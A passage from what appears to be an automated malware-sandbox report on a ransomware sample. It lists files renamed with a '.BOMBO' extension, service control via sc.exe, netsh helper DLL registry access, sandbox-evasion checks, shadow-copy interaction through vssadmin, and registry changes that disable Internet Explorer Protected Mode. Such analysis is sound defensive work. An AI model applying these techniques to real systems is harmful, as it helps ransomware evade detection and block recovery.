Files\Common Files\microsoft shared\ink\ipsesp.xml 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\+NewSQLServerConnection.odc.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ExcelCtxUICellModel.bin.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\pkcs11wrapper.md.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.osmuxmui.msi.16.en-us.xml.id-48EE1B4B.[[email protected]].BOMBO 16.exe File created C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPack2019Eula.txt.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Runtime.dll 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-80.png 16.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\THMBNAIL.PNG.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif 16.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Private.DataContractSerialization.dll.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange Red.xml 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WordNaiveBayesCommandRanker.txt 16.exe File created C:\Program Files\Microsoft Office\root\Office16\OneNote\SendToOneNote-PipelineConfig.xml.id-48EE1B4B.[[email protected]].BOMBO 16.exe File created C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN107.XML.id-48EE1B4B.[[email protected]].BOMBO 16.exe -
Launches sc.exe 13 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 796 sc.exe 236 sc.exe 4512 sc.exe 4984 sc.exe 4924 sc.exe 988 sc.exe 4840 sc.exe 5016 sc.exe 396 sc.exe 3084 sc.exe 984 sc.exe 2000 sc.exe 72 sc.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 25 IoCs
pid pid_target Process procid_target 3192 4852 WerFault.exe 86 4608 3332 WerFault.exe 85 3064 3636 WerFault.exe 84 4716 2612 WerFault.exe 426 1324 2300 WerFault.exe 441 3216 4360 WerFault.exe 431 5228 3600 WerFault.exe 439 5344 3220 WerFault.exe 458 5424 2580 WerFault.exe 459 5960 5560 WerFault.exe 483 332 5240 WerFault.exe 491 5504 5208 WerFault.exe 496 5920 5768 WerFault.exe 504 6020 3332 WerFault.exe 510 2076 6028 WerFault.exe 555 5196 4872 WerFault.exe 511 4492 5396 WerFault.exe 564 5432 5712 WerFault.exe 578 1180 5828 WerFault.exe 570 7340 1520 WerFault.exe 584 8556 1508 WerFault.exe 599 8276 2456 WerFault.exe 607 8136 1616 WerFault.exe 610 6476 1976 WerFault.exe 622 8892 10736 WerFault.exe 648 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language foldani.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 15.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmstp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language update.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecurityTaskManager_Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LtHv0O2KZDK4M637.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wini.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VyprVPN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language o37oc73i7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 19.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language joinResult.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4196 cmd.exe 1616 PING.EXE -
NSIS installer 4 IoCs
resource yara_rule behavioral1/files/0x001900000002ab5d-37.dat nsis_installer_1 behavioral1/files/0x001900000002ab5d-37.dat nsis_installer_2 behavioral1/files/0x001900000002ab6a-85.dat nsis_installer_1 behavioral1/files/0x001900000002ab6a-85.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 45 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString o37oc73i7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString o37oc73i7.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 o37oc73i7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ou55sg33s_1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 oof.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString o37oc73i7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString o37oc73i7.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 o37oc73i7.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString o37oc73i7.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 o37oc73i7.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString o37oc73i7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 o37oc73i7.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 o37oc73i7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ou55sg33s_1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 o37oc73i7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString oof.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 o37oc73i7.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString o37oc73i7.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 o37oc73i7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString o37oc73i7.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 3728 timeout.exe 240 timeout.exe 4112 timeout.exe 1136 timeout.exe 3396 timeout.exe -
Enumerates system info in registry 2 TTPs 23 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 1732 ipconfig.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 10276 vssadmin.exe -
Kills process with taskkill 3 IoCs
pid Process 3776 taskkill.exe 2488 taskkill.exe 5020 taskkill.exe -
Modifies Internet Explorer Protected Mode 1 TTPs 40 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe -
Modifies Internet Explorer Protected Mode Banner 1 TTPs 10 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe -
